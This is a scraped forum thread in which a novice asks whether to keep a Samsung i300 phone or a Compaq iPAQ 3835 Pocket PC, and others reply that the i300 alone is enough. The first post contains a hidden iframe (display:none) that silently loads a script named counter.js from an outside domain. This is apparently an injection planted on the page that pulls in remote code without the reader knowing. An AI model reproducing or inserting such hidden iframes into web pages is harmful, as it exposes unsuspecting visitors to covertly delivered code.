+ Reply to Thread

Thread: iPaq + i300

iPaq + i300

I am a novice. I recently received both the Samsung i300 and the Compaq iPAQ 3835 Pocket PC. Any direction this group can offer relative to getting started optimizing use will be appreciated. I'm not sure I need both!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Perhaps I made a mistake!

Is it the fact that I'm inexperienced that my question is ignored?
    Should I go elsewhere?

Administrator

Arrow

Welcome to the board.

Is it the fact that I'm inexperienced that my question is ignored?
    no that is NOT the reason. everyone here at one time was inexperienced in this area.

i cant speak for you. i dont know what your tastes are or what you do in your everyday life, however i can tell you that all you need is the i300. its a phone/pda with color screen and can conect to the internet. i dont see any reason for you to carry both. i dont use an ipaq so i cant tell you any thing positive or negative about it. you may also join a ipaq discussion board to learn more about it.

some here have or have used an ipaq and they may share some of their stories/tips. but rememeber, no one has to reply to any post if they dont want to, so no need to disrespect the board or get angry that no one has yet replied to your thread.

heck, ive posted some things in the past at other sites and have not gotten any response. i didnt post a nasty email, i just mearly went to another source to find out what i needed.

maybe you should do the same.

Well for one the Ipaq is not a Palm device. I can't think of qany reason for needing both. Thats about all I can offer. That is the appeal of the 300/330/ or any other hybrid for that matter. Not that it does so much, as the Ipag may be the better PDA, but that it eiminates the need for both.

PS - I didn't reply because I'm not sure what you are asking.

Here's my 2 cents, having used both platforms.